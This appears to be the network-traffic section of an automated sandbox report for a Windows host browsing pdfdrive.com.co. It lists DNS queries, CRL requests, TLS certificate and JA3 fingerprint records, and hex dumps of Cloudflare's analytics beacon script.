Jan 10, 2025 09:50:07.067996025 CET	53	55052	1.1.1.1	192.168.2.24
Jan 10, 2025 09:50:07.105632067 CET	52092	53	192.168.2.24	1.1.1.1
Jan 10, 2025 09:50:07.105757952 CET	55869	53	192.168.2.24	1.1.1.1
Jan 10, 2025 09:50:07.123265982 CET	53	55869	1.1.1.1	192.168.2.24
Jan 10, 2025 09:50:07.130362034 CET	53	52092	1.1.1.1	192.168.2.24
Jan 10, 2025 09:50:07.986596107 CET	53	52730	1.1.1.1	192.168.2.24
Jan 10, 2025 09:50:08.040514946 CET	51891	53	192.168.2.24	1.1.1.1
Jan 10, 2025 09:50:08.040729046 CET	50606	53	192.168.2.24	1.1.1.1
Jan 10, 2025 09:50:08.048752069 CET	53	51891	1.1.1.1	192.168.2.24
Jan 10, 2025 09:50:08.049777985 CET	53	50606	1.1.1.1	192.168.2.24
Jan 10, 2025 09:50:10.546318054 CET	60711	53	192.168.2.24	1.1.1.1
Jan 10, 2025 09:50:10.546627998 CET	60341	53	192.168.2.24	1.1.1.1
Jan 10, 2025 09:50:10.552388906 CET	53	62053	1.1.1.1	192.168.2.24
Jan 10, 2025 09:50:10.573174953 CET	53	60711	1.1.1.1	192.168.2.24
Jan 10, 2025 09:50:10.573326111 CET	53	60341	1.1.1.1	192.168.2.24
Jan 10, 2025 09:50:10.771991968 CET	62535	53	192.168.2.24	1.1.1.1
Jan 10, 2025 09:50:10.772221088 CET	58789	53	192.168.2.24	1.1.1.1
Jan 10, 2025 09:50:10.779397011 CET	53	58789	1.1.1.1	192.168.2.24
Jan 10, 2025 09:50:11.359797955 CET	53	50436	1.1.1.1	192.168.2.24
Jan 10, 2025 09:50:12.207664967 CET	53	61812	1.1.1.1	192.168.2.24
Jan 10, 2025 09:50:12.249146938 CET	53	51873	1.1.1.1	192.168.2.24
Jan 10, 2025 09:50:12.394987106 CET	55975	53	192.168.2.24	1.1.1.1
Jan 10, 2025 09:50:12.395109892 CET	52887	53	192.168.2.24	1.1.1.1
Jan 10, 2025 09:50:12.401896000 CET	53	55975	1.1.1.1	192.168.2.24
Jan 10, 2025 09:50:12.445699930 CET	53	52887	1.1.1.1	192.168.2.24
Jan 10, 2025 09:50:12.455091953 CET	60889	53	192.168.2.24	1.1.1.1
Jan 10, 2025 09:50:12.455362082 CET	52354	53	192.168.2.24	1.1.1.1
Jan 10, 2025 09:50:12.456039906 CET	54502	53	192.168.2.24	1.1.1.1
Jan 10, 2025 09:50:12.456263065 CET	51618	53	192.168.2.24	1.1.1.1
Jan 10, 2025 09:50:12.462313890 CET	53	52354	1.1.1.1	192.168.2.24
Jan 10, 2025 09:50:12.462574959 CET	53	60889	1.1.1.1	192.168.2.24
Jan 10, 2025 09:50:12.463139057 CET	53	54502	1.1.1.1	192.168.2.24
Jan 10, 2025 09:50:12.463515043 CET	53	51618	1.1.1.1	192.168.2.24
Jan 10, 2025 09:50:13.521229029 CET	61584	53	192.168.2.24	1.1.1.1
Jan 10, 2025 09:50:13.521794081 CET	57617	53	192.168.2.24	1.1.1.1
Jan 10, 2025 09:50:13.528054953 CET	53	61584	1.1.1.1	192.168.2.24
Jan 10, 2025 09:50:13.528971910 CET	53	57617	1.1.1.1	192.168.2.24
Jan 10, 2025 09:50:13.947798014 CET	57529	53	192.168.2.24	1.1.1.1
Jan 10, 2025 09:50:13.947921038 CET	52646	53	192.168.2.24	1.1.1.1
Jan 10, 2025 09:50:13.949604034 CET	59628	53	192.168.2.24	1.1.1.1
Jan 10, 2025 09:50:13.949790001 CET	55928	53	192.168.2.24	1.1.1.1
Jan 10, 2025 09:50:13.954508066 CET	53	57529	1.1.1.1	192.168.2.24
Jan 10, 2025 09:50:13.955581903 CET	53	52646	1.1.1.1	192.168.2.24
Jan 10, 2025 09:50:13.956286907 CET	53	59628	1.1.1.1	192.168.2.24
Jan 10, 2025 09:50:13.957257032 CET	53	55928	1.1.1.1	192.168.2.24
Jan 10, 2025 09:50:14.287873983 CET	57592	53	192.168.2.24	1.1.1.1
Jan 10, 2025 09:50:14.288283110 CET	57680	53	192.168.2.24	1.1.1.1
Jan 10, 2025 09:50:14.306262016 CET	53	57680	1.1.1.1	192.168.2.24
Jan 10, 2025 09:50:14.306301117 CET	53	57592	1.1.1.1	192.168.2.24
Jan 10, 2025 09:50:14.943438053 CET	58924	53	192.168.2.24	1.1.1.1
Jan 10, 2025 09:50:14.943500996 CET	55558	53	192.168.2.24	1.1.1.1
Jan 10, 2025 09:50:14.943845034 CET	56555	53	192.168.2.24	1.1.1.1
Jan 10, 2025 09:50:14.943962097 CET	59699	53	192.168.2.24	1.1.1.1
Jan 10, 2025 09:50:14.949157953 CET	49691	53	192.168.2.24	1.1.1.1
Jan 10, 2025 09:50:14.949342966 CET	58027	53	192.168.2.24	1.1.1.1
Jan 10, 2025 09:50:14.950278997 CET	53	58924	1.1.1.1	192.168.2.24
Jan 10, 2025 09:50:14.950464964 CET	53	56555	1.1.1.1	192.168.2.24
Jan 10, 2025 09:50:14.950735092 CET	53	55558	1.1.1.1	192.168.2.24
Jan 10, 2025 09:50:14.950845957 CET	53	59699	1.1.1.1	192.168.2.24
Jan 10, 2025 09:50:14.956260920 CET	53	58027	1.1.1.1	192.168.2.24
Jan 10, 2025 09:50:14.959131956 CET	53	49691	1.1.1.1	192.168.2.24
Jan 10, 2025 09:50:16.152345896 CET	58580	53	192.168.2.24	1.1.1.1
Jan 10, 2025 09:50:16.152448893 CET	50615	53	192.168.2.24	1.1.1.1
Jan 10, 2025 09:50:16.159303904 CET	53	50615	1.1.1.1	192.168.2.24
Jan 10, 2025 09:50:16.160047054 CET	53	58580	1.1.1.1	192.168.2.24
Jan 10, 2025 09:50:16.206605911 CET	65238	53	192.168.2.24	1.1.1.1
Jan 10, 2025 09:50:16.206737041 CET	51452	53	192.168.2.24	1.1.1.1
Jan 10, 2025 09:50:16.213502884 CET	53	65238	1.1.1.1	192.168.2.24
Jan 10, 2025 09:50:16.213699102 CET	53	51452	1.1.1.1	192.168.2.24
Jan 10, 2025 09:50:17.550828934 CET	54351	53	192.168.2.24	1.1.1.1
Jan 10, 2025 09:50:17.550951004 CET	54236	53	192.168.2.24	1.1.1.1
Jan 10, 2025 09:50:17.557787895 CET	53	54351	1.1.1.1	192.168.2.24
Jan 10, 2025 09:50:17.558526039 CET	53	54236	1.1.1.1	192.168.2.24
Jan 10, 2025 09:50:17.793662071 CET	53	51888	1.1.1.1	192.168.2.24
Jan 10, 2025 09:50:18.654913902 CET	63747	53	192.168.2.24	1.1.1.1
Jan 10, 2025 09:50:18.655400991 CET	63712	53	192.168.2.24	1.1.1.1
Jan 10, 2025 09:50:18.665652990 CET	53	63747	1.1.1.1	192.168.2.24
Jan 10, 2025 09:50:18.665671110 CET	53	63712	1.1.1.1	192.168.2.24
Jan 10, 2025 09:50:21.431246996 CET	63866	53	192.168.2.24	1.1.1.1
Jan 10, 2025 09:50:21.431391954 CET	62907	53	192.168.2.24	1.1.1.1
Jan 10, 2025 09:50:21.438503981 CET	53	62907	1.1.1.1	192.168.2.24
Jan 10, 2025 09:50:21.439222097 CET	53	63866	1.1.1.1	192.168.2.24
Jan 10, 2025 09:50:23.118443966 CET	57793	53	192.168.2.24	1.1.1.1
Jan 10, 2025 09:50:23.118597031 CET	49541	53	192.168.2.24	1.1.1.1
Jan 10, 2025 09:50:23.125312090 CET	53	57793	1.1.1.1	192.168.2.24
Jan 10, 2025 09:50:23.125540972 CET	53	49541	1.1.1.1	192.168.2.24
Jan 10, 2025 09:50:23.459037066 CET	53	53977	1.1.1.1	192.168.2.24
Jan 10, 2025 09:50:28.914746046 CET	53	63664	1.1.1.1	192.168.2.24
Jan 10, 2025 09:50:35.918009996 CET	63977	53	192.168.2.24	1.1.1.1
Jan 10, 2025 09:50:35.918010950 CET	61081	53	192.168.2.24	1.1.1.1
Jan 10, 2025 09:50:35.935926914 CET	53	61081	1.1.1.1	192.168.2.24
Jan 10, 2025 09:50:35.941622019 CET	53	63977	1.1.1.1	192.168.2.24
Jan 10, 2025 09:50:36.897499084 CET	53	59030	1.1.1.1	192.168.2.24
Jan 10, 2025 09:50:38.006524086 CET	62978	53	192.168.2.24	1.1.1.1
Jan 10, 2025 09:50:38.006639004 CET	52366	53	192.168.2.24	1.1.1.1
Jan 10, 2025 09:50:38.014074087 CET	53	62978	1.1.1.1	192.168.2.24
Jan 10, 2025 09:50:38.014108896 CET	53	52366	1.1.1.1	192.168.2.24
Jan 10, 2025 09:50:39.207020044 CET	63497	53	192.168.2.24	1.1.1.1
Jan 10, 2025 09:50:39.207020044 CET	53373	53	192.168.2.24	1.1.1.1
Jan 10, 2025 09:50:39.217303991 CET	53	63497	1.1.1.1	192.168.2.24
Jan 10, 2025 09:50:39.218012094 CET	53	53373	1.1.1.1	192.168.2.24
Jan 10, 2025 09:50:39.262831926 CET	61409	53	192.168.2.24	1.1.1.1
Jan 10, 2025 09:50:39.264210939 CET	59411	53	192.168.2.24	1.1.1.1
Jan 10, 2025 09:50:39.272911072 CET	53	61409	1.1.1.1	192.168.2.24
Jan 10, 2025 09:50:39.276721954 CET	53	59411	1.1.1.1	192.168.2.24
Jan 10, 2025 09:50:40.935323954 CET	49886	53	192.168.2.24	1.1.1.1
Jan 10, 2025 09:50:40.935550928 CET	62104	53	192.168.2.24	1.1.1.1
Jan 10, 2025 09:50:40.943646908 CET	53	49886	1.1.1.1	192.168.2.24
Jan 10, 2025 09:50:40.944861889 CET	53	62104	1.1.1.1	192.168.2.24
Jan 10, 2025 09:50:41.200340986 CET	57052	53	192.168.2.24	1.1.1.1
Jan 10, 2025 09:50:41.200412035 CET	57229	53	192.168.2.24	1.1.1.1
Jan 10, 2025 09:50:41.208255053 CET	53	57229	1.1.1.1	192.168.2.24
Jan 10, 2025 09:50:41.210832119 CET	53	57052	1.1.1.1	192.168.2.24
Jan 10, 2025 09:50:42.311400890 CET	57291	53	192.168.2.24	1.1.1.1
Jan 10, 2025 09:50:42.311778069 CET	50510	53	192.168.2.24	1.1.1.1
Jan 10, 2025 09:50:42.324827909 CET	53	50510	1.1.1.1	192.168.2.24
Jan 10, 2025 09:50:42.475560904 CET	53	57291	1.1.1.1	192.168.2.24
Jan 10, 2025 09:50:44.247185946 CET	63499	53	192.168.2.24	1.1.1.1
Jan 10, 2025 09:50:44.247364998 CET	64593	53	192.168.2.24	1.1.1.1
Jan 10, 2025 09:50:44.260842085 CET	53	63499	1.1.1.1	192.168.2.24
Jan 10, 2025 09:50:44.261356115 CET	53	64593	1.1.1.1	192.168.2.24
Jan 10, 2025 09:50:45.478745937 CET	60471	53	192.168.2.24	1.1.1.1
Jan 10, 2025 09:50:45.478871107 CET	61708	53	192.168.2.24	1.1.1.1
Jan 10, 2025 09:50:45.485337973 CET	53	60471	1.1.1.1	192.168.2.24
Jan 10, 2025 09:50:45.485946894 CET	53	61708	1.1.1.1	192.168.2.24
Jan 10, 2025 09:50:46.780024052 CET	64101	53	192.168.2.24	1.1.1.1
Jan 10, 2025 09:50:46.780148983 CET	54995	53	192.168.2.24	1.1.1.1
Jan 10, 2025 09:50:46.787229061 CET	53	54995	1.1.1.1	192.168.2.24
Jan 10, 2025 09:50:46.787262917 CET	53	64101	1.1.1.1	192.168.2.24
Jan 10, 2025 09:50:47.855242014 CET	62137	53	192.168.2.24	1.1.1.1
Jan 10, 2025 09:50:47.855575085 CET	61290	53	192.168.2.24	1.1.1.1
Jan 10, 2025 09:50:47.866153955 CET	53	61290	1.1.1.1	192.168.2.24
Jan 10, 2025 09:50:47.871943951 CET	53	62137	1.1.1.1	192.168.2.24
Jan 10, 2025 09:50:57.259352922 CET	55839	53	192.168.2.24	1.1.1.1
Jan 10, 2025 09:50:57.259352922 CET	52959	53	192.168.2.24	1.1.1.1
Jan 10, 2025 09:50:57.266242027 CET	53	55839	1.1.1.1	192.168.2.24
Jan 10, 2025 09:50:57.266829967 CET	53	52959	1.1.1.1	192.168.2.24
Jan 10, 2025 09:50:59.200150013 CET	53	57860	1.1.1.1	192.168.2.24
Jan 10, 2025 09:50:59.413928986 CET	53	61779	1.1.1.1	192.168.2.24
Jan 10, 2025 09:51:01.116143942 CET	54668	53	192.168.2.24	1.1.1.1
Jan 10, 2025 09:51:01.116272926 CET	49215	53	192.168.2.24	1.1.1.1
Jan 10, 2025 09:51:01.123064041 CET	53	54668	1.1.1.1	192.168.2.24
Jan 10, 2025 09:51:01.125092030 CET	53	49215	1.1.1.1	192.168.2.24
Jan 10, 2025 09:51:03.969403028 CET	52635	53	192.168.2.24	1.1.1.1
Jan 10, 2025 09:51:03.969527960 CET	60993	53	192.168.2.24	1.1.1.1
Jan 10, 2025 09:51:03.976856947 CET	53	60993	1.1.1.1	192.168.2.24
Jan 10, 2025 09:51:03.976897955 CET	53	52635	1.1.1.1	192.168.2.24

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Jan 10, 2025 09:50:05.296451092 CET	192.168.2.24	1.1.1.1	c219	(Port unreachable)	Destination Unreachable
Jan 10, 2025 09:50:12.445851088 CET	192.168.2.24	1.1.1.1	c24a	(Port unreachable)	Destination Unreachable

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:50:45.508882046 CET	200	OUT	GET /r/r1.crl HTTP/1.1 Cache-Control: max-age = 3000 Connection: Keep-Alive Accept: / If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMT User-Agent: Microsoft-CryptoAPI/10.0 Host: c.pki.goog
Jan 10, 2025 09:50:46.124484062 CET	222	IN	HTTP/1.1 304 Not Modified Date: Fri, 10 Jan 2025 08:44:54 GMT Expires: Fri, 10 Jan 2025 09:34:54 GMT Last-Modified: Thu, 25 Jul 2024 14:48:00 GMT Cache-Control: public, max-age=3000 Vary: Accept-Encoding Age: 352

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:50:46.142105103 CET	227	OUT	GET / HTTP/1.1 Cache-Control: max-age = 3600 Connection: Keep-Alive Accept: / If-Modified-Since: Mon, 12 Feb 2024 22:07:27 GMT If-None-Match: "65ca969f-2cd" User-Agent: Microsoft-CryptoAPI/10.0 Host: x1.c.lencr.org
Jan 10, 2025 09:50:46.786628962 CET	1023	IN	HTTP/1.1 200 OK Server: nginx Content-Type: application/pkix-crl Last-Modified: Fri, 13 Dec 2024 18:01:23 GMT ETag: "675c7673-2de" Cache-Control: max-age=3600 Expires: Fri, 10 Jan 2025 09:50:46 GMT Date: Fri, 10 Jan 2025 08:50:46 GMT Content-Length: 734 Connection: keep-alive Data Raw: 30 82 02 da 30 81 c3 02 01 01 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 4f 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 29 30 27 06 03 55 04 0a 13 20 49 6e 74 65 72 6e 65 74 20 53 65 63 75 72 69 74 79 20 52 65 73 65 61 72 63 68 20 47 72 6f 75 70 31 15 30 13 06 03 55 04 03 13 0c 49 53 52 47 20 52 6f 6f 74 20 58 31 17 0d 32 34 31 32 31 31 30 30 30 30 30 30 5a 17 0d 32 35 31 31 31 30 32 33 35 39 35 39 5a a0 40 30 3e 30 1f 06 03 55 1d 23 04 18 30 16 80 14 79 b4 59 e6 7b b6 e5 e4 01 73 80 08 88 c8 1a 58 f6 e9 9b 6e 30 0a 06 03 55 1d 14 04 03 02 01 69 30 0f 06 03 55 1d 1c 01 01 ff 04 05 30 03 82 01 ff 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 03 82 02 01 00 25 d9 d5 af d1 d6 2f 91 05 35 50 65 d7 ad 13 d8 3b 73 d1 3f 5e 09 69 7f d7 82 29 12 c5 82 d0 96 fe 5f 07 a4 fe f5 92 dc e4 e2 8a 1a 2a 29 c5 eb 97 c8 85 a5 44 9b 9d ba 7b 05 2b 3f e3 3c 18 1c de 8d 37 f6 27 b5 e7 9b ef 45 e7 57 0e c1 f9 07 a5 95 44 fe e1 de 7f 9d e1 31 8c f8 1b 4f 18 5d f8 3d d7 5b e6 e2 03 a6 cb 71 0d ef 7a fe e0 8e f4 5d 1c c5 [TRUNCATED] Data Ascii: 000H0O10UUS1)0'U Internet Security Research Group10UISRG Root X1241211000000Z251110235959Z@0>0U#0yY{sXn0Ui0U00H%/5Pe;s?^i)_)D{+?<7'EWD1O]=[qz]"2t@^+(zULdQpK?W)pqxW[6[V7?36_s$BwT+xw_]df_nu}yIqC`sVuP,@`\|T+`/Pm w[!:O%'w9enSkbv}gGL")V 2kzr/xx}8i]oA,^i=pt>#6&7$_?k/( kAslBQDhXh~N T/BF?QCGwsS:

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Jan 10, 2025 09:50:12.029817104 CET	139.45.197.107	443	192.168.2.24	49763	CN=shoordaird.com CN=R10, O=Let's Encrypt, C=US	CN=R10, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=US	Wed Nov 13 06:27:15 CET 2024 Wed Mar 13 01:00:00 CET 2024	Tue Feb 11 06:27:14 CET 2025 Sat Mar 13 00:59:59 CET 2027	771,4865-4866-4867-49195-49199-49196-49200-52393-52392-49171-49172-156-157-47-53,27-13-5-45-10-65281-18-35-65037-43-0-17513-11-23-51-16,4588-29-23-24,0	6043bedff34a9e3d35daaa65f18446f8
Jan 10, 2025 09:50:12.029817104 CET	139.45.197.107	443	192.168.2.24	49763	CN=R10, O=Let's Encrypt, C=US	CN=ISRG Root X1, O=Internet Security Research Group, C=US	Wed Mar 13 01:00:00 CET 2024	Sat Mar 13 00:59:59 CET 2027		6043bedff34a9e3d35daaa65f18446f8
Jan 10, 2025 09:50:13.886820078 CET	139.45.197.107	443	192.168.2.24	49770	CN=shoordaird.com CN=R10, O=Let's Encrypt, C=US	CN=R10, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=US	Wed Nov 13 06:27:15 CET 2024 Wed Mar 13 01:00:00 CET 2024	Tue Feb 11 06:27:14 CET 2025 Sat Mar 13 00:59:59 CET 2027	771,4865-4866-4867-49195-49199-49196-49200-52393-52392-49171-49172-156-157-47-53,45-23-43-5-17513-18-16-13-51-0-27-35-65281-10-65037-11,4588-29-23-24,0	50f29990211bf3bdca22a25d98efc47b
Jan 10, 2025 09:50:13.886820078 CET	139.45.197.107	443	192.168.2.24	49770	CN=R10, O=Let's Encrypt, C=US	CN=ISRG Root X1, O=Internet Security Research Group, C=US	Wed Mar 13 01:00:00 CET 2024	Sat Mar 13 00:59:59 CET 2027		50f29990211bf3bdca22a25d98efc47b
Jan 10, 2025 09:50:15.016314983 CET	139.45.197.107	443	192.168.2.24	49774	CN=shoordaird.com CN=R10, O=Let's Encrypt, C=US	CN=R10, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=US	Wed Nov 13 06:27:15 CET 2024 Wed Mar 13 01:00:00 CET 2024	Tue Feb 11 06:27:14 CET 2025 Sat Mar 13 00:59:59 CET 2027	771,4865-4866-4867-49195-49199-49196-49200-52393-52392-49171-49172-156-157-47-53,18-65281-27-23-13-0-65037-11-16-35-5-45-51-17513-43-10,4588-29-23-24,0	08cf9f3811647b05ffbd3ec1ed606d8e
Jan 10, 2025 09:50:15.016314983 CET	139.45.197.107	443	192.168.2.24	49774	CN=R10, O=Let's Encrypt, C=US	CN=ISRG Root X1, O=Internet Security Research Group, C=US	Wed Mar 13 01:00:00 CET 2024	Sat Mar 13 00:59:59 CET 2027		08cf9f3811647b05ffbd3ec1ed606d8e
Jan 10, 2025 09:50:37.709055901 CET	139.45.197.107	443	192.168.2.24	49804	CN=shoordaird.com CN=R10, O=Let's Encrypt, C=US	CN=R10, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=US	Wed Nov 13 06:27:15 CET 2024 Wed Mar 13 01:00:00 CET 2024	Tue Feb 11 06:27:14 CET 2025 Sat Mar 13 00:59:59 CET 2027	771,4865-4866-4867-49195-49199-49196-49200-52393-52392-49171-49172-156-157-47-53,0-65037-65281-35-45-10-27-16-17513-51-5-13-11-23-18-43,4588-29-23-24,0	3c5160363e3e7da7878ee13fcbd85898
Jan 10, 2025 09:50:37.709055901 CET	139.45.197.107	443	192.168.2.24	49804	CN=R10, O=Let's Encrypt, C=US	CN=ISRG Root X1, O=Internet Security Research Group, C=US	Wed Mar 13 01:00:00 CET 2024	Sat Mar 13 00:59:59 CET 2027		3c5160363e3e7da7878ee13fcbd85898
Jan 10, 2025 09:50:37.714255095 CET	139.45.197.107	443	192.168.2.24	49805	CN=shoordaird.com CN=R10, O=Let's Encrypt, C=US	CN=R10, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=US	Wed Nov 13 06:27:15 CET 2024 Wed Mar 13 01:00:00 CET 2024	Tue Feb 11 06:27:14 CET 2025 Sat Mar 13 00:59:59 CET 2027	771,4865-4866-4867-49195-49199-49196-49200-52393-52392-49171-49172-156-157-47-53,35-16-51-27-17513-23-11-18-65281-65037-0-13-45-43-5-10,4588-29-23-24,0	45c9e71ae2f9b35b5e79e6fbd73d70e3
Jan 10, 2025 09:50:37.714255095 CET	139.45.197.107	443	192.168.2.24	49805	CN=R10, O=Let's Encrypt, C=US	CN=ISRG Root X1, O=Internet Security Research Group, C=US	Wed Mar 13 01:00:00 CET 2024	Sat Mar 13 00:59:59 CET 2027		45c9e71ae2f9b35b5e79e6fbd73d70e3

Timestamp	Bytes transferred	Direction	Data
2025-01-10 08:50:07 UTC	625	OUT	GET /beacon.min.js/vcd15cbe7772f49c399c6a5babf22c1241717689176015 HTTP/1.1 Host: static.cloudflareinsights.com Connection: keep-alive Origin: https://pdfdrive.com.co sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24" sec-ch-ua-mobile: ?0 Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: script Referer: https://pdfdrive.com.co/ Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-01-10 08:50:07 UTC	373	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 08:50:07 GMT Content-Type: text/javascript;charset=UTF-8 Content-Length: 19948 Connection: close Access-Control-Allow-Origin: * Cache-Control: public, max-age=86400 ETag: W/"2024.6.1" Last-Modified: Thu, 06 Jun 2024 15:52:56 GMT Cross-Origin-Resource-Policy: cross-origin Server: cloudflare CF-RAY: 8ffb6aeeec7f41ef-EWR
2025-01-10 08:50:07 UTC	1369	IN	Data Raw: 21 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 7b 33 34 33 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 6f 72 28 76 61 72 20 74 3d 5b 5d 2c 6e 3d 30 3b 6e 3c 32 35 36 3b 2b 2b 6e 29 74 5b 6e 5d 3d 28 6e 2b 32 35 36 29 2e 74 6f 53 74 72 69 6e 67 28 31 36 29 2e 73 75 62 73 74 72 28 31 29 3b 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 29 7b 76 61 72 20 72 3d 6e 7c 7c 30 2c 69 3d 74 3b 72 65 74 75 72 6e 5b 69 5b 65 5b 72 2b 2b 5d 5d 2c 69 5b 65 5b 72 2b 2b 5d 5d 2c 69 5b 65 5b 72 2b 2b 5d 5d 2c 69 5b 65 5b 72 2b 2b 5d 5d 2c 22 2d 22 2c 69 5b 65 5b 72 2b 2b 5d 5d 2c 69 5b 65 5b 72 2b 2b 5d 5d 2c 22 2d 22 2c 69 5b 65 5b 72 2b 2b 5d 5d 2c 69 5b 65 5b 72 2b 2b 5d 5d 2c 22 2d 22 2c 69 5b 65 5b 72 2b Data Ascii: !function(){var e={343:function(e){"use strict";for(var t=[],n=0;n<256;++n)t[n]=(n+256).toString(16).substr(1);e.exports=function(e,n){var r=n\|\|0,i=t;return[i[e[r++]],i[e[r++]],i[e[r++]],i[e[r++]],"-",i[e[r++]],i[e[r++]],"-",i[e[r++]],i[e[r++]],"-",i[e[r+
2025-01-10 08:50:07 UTC	1369	IN	Data Raw: 72 20 69 3d 6e 28 36 39 39 29 2c 6f 3d 6e 28 37 35 32 29 2c 61 3d 6e 28 31 30 34 29 2c 63 3d 6e 28 35 30 38 29 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 65 29 7b 76 61 72 20 74 3d 22 22 3b 69 66 28 74 3d 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 6f 72 69 67 69 6e 3f 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 6f 72 69 67 69 6e 3a 22 22 2e 63 6f 6e 63 61 74 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 72 6f 74 6f 63 6f 6c 2c 22 3a 2f 2f 22 29 2e 63 6f 6e 63 61 74 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 29 2c 65 26 26 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 29 69 66 28 30 3d 3d 3d 65 2e 69 6e 64 65 78 4f 66 28 22 2f 22 29 29 74 2b 3d 65 3b 65 6c 73 65 20 74 72 79 7b 76 61 Data Ascii: r i=n(699),o=n(752),a=n(104),c=n(508);!function(){function e(e){var t="";if(t=window.location.origin?window.location.origin:"".concat(window.location.protocol,"://").concat(window.location.host),e&&"string"==typeof e)if(0===e.indexOf("/"))t+=e;else try{va
2025-01-10 08:50:07 UTC	1369	IN	Data Raw: 29 3d 3d 74 26 26 28 6e 75 6c 6c 3d 3d 77 3f 76 6f 69 64 20 30 3a 77 2e 74 72 69 67 67 65 72 65 64 29 7c 7c 50 28 29 2c 5f 28 74 29 7d 21 62 26 26 77 26 26 28 62 3d 21 30 2c 42 28 29 29 7d 65 6c 73 65 22 76 69 73 69 62 6c 65 22 3d 3d 3d 64 6f 63 75 6d 65 6e 74 2e 76 69 73 69 62 69 6c 69 74 79 53 74 61 74 65 26 26 28 6e 65 77 20 44 61 74 65 29 2e 67 65 74 54 69 6d 65 28 29 7d 29 29 3b 76 61 72 20 45 3d 7b 7d 3b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 50 65 72 66 6f 72 6d 61 6e 63 65 4f 62 73 65 72 76 65 72 26 26 28 28 30 2c 61 2e 6f 6e 4c 43 50 29 28 78 29 2c 28 30 2c 61 2e 6f 6e 46 49 44 29 28 78 29 2c 28 30 2c 61 2e 6f 6e 46 43 50 29 28 78 29 2c 28 30 2c 61 2e 6f 6e 49 4e 50 29 28 78 29 2c 28 30 2c 61 2e 6f 6e 54 54 46 42 29 28 78 29 2c Data Ascii: )==t&&(null==w?void 0:w.triggered)\|\|P(),_(t)}!b&&w&&(b=!0,B())}else"visible"===document.visibilityState&&(new Date).getTime()}));var E={};"function"==typeof PerformanceObserver&&((0,a.onLCP)(x),(0,a.onFID)(x),(0,a.onFCP)(x),(0,a.onINP)(x),(0,a.onTTFB)(x),
2025-01-10 08:50:07 UTC	1369	IN	Data Raw: 2c 70 26 26 28 28 30 2c 6f 2e 73 65 6e 64 4f 62 6a 65 63 74 42 65 61 63 6f 6e 29 28 22 22 2c 61 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 29 2c 21 31 2c 43 29 2c 76 6f 69 64 20 30 21 3d 3d 70 2e 66 6f 72 77 61 72 64 26 26 76 6f 69 64 20 30 21 3d 3d 70 2e 66 6f 72 77 61 72 64 2e 75 72 6c 26 26 28 30 2c 6f 2e 73 65 6e 64 4f 62 6a 65 63 74 42 65 61 63 6f 6e 29 28 22 22 2c 61 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 29 2c 21 31 2c 70 2e 66 6f 72 77 61 72 64 2e 75 72 6c 29 29 29 7d 2c 42 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 73 2e 67 65 74 45 6e 74 72 69 65 73 42 79 54 79 70 65 28 22 6e 61 76 69 67 61 74 69 6f 6e 22 29 5b 30 5d 2c 6e 3d 22 22 3b 74 72 79 7b 6e 3d 22 66 75 6e 63 74 69 6f 6e 22 Data Ascii: ,p&&((0,o.sendObjectBeacon)("",a,(function(){}),!1,C),void 0!==p.forward&&void 0!==p.forward.url&&(0,o.sendObjectBeacon)("",a,(function(){}),!1,p.forward.url)))},B=function(){var t=function(){var t=s.getEntriesByType("navigation")[0],n="";try{n="function"
